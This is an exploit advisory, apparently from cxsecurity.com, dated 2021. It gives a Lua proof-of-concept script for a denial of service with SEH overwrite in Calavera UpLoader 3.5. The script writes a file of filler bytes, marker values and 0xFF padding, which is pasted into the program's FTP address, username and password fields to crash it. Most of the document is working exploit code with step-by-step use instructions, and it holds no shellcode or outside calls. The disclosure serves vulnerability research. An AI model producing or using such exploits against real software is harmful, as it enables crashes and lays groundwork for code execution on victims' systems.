Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)

2021.01.04
uromulou (BR)
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

-- Title : Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite).
-- Courtesy of Rômulo, @uromulou - Date : 04/01/2021.
-- PoC < Proof of Concept:
--
-- 1 -> Run the lua script, to create file "poc.dat"...
-- 2 -> Copy the content of the new file "poc.dat" to clipboard...
-- 3 -> Open the application...
-- 4 -> Click on "Settings"...
-- 5 -> Paste contents of the generated file into the parameters "FTP Address", "Username and Password". Furthermore, check the box with the statement "Check to save password in preferences"...
-- 6 -> Down...
--

print("-> Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)")
print("-> This exploit was written by Rômulo, @uromulou.")

-- Buffer layout: 477 bytes of filler, two 4-byte marker values,
-- then 2000 bytes of 0xFF.
local buffer = string.rep("A", 477) .. "BBBB" .. "CCCC" .. string.rep("\xff", 2000)

-- Write in binary mode so the 0xFF bytes reach the file unchanged;
-- assert() reports the reason if the file cannot be opened.
local file = assert(io.open("poc.dat", "wb"))
file:write(buffer)
file:close()



Copyright 2021, cxsecurity.com

 
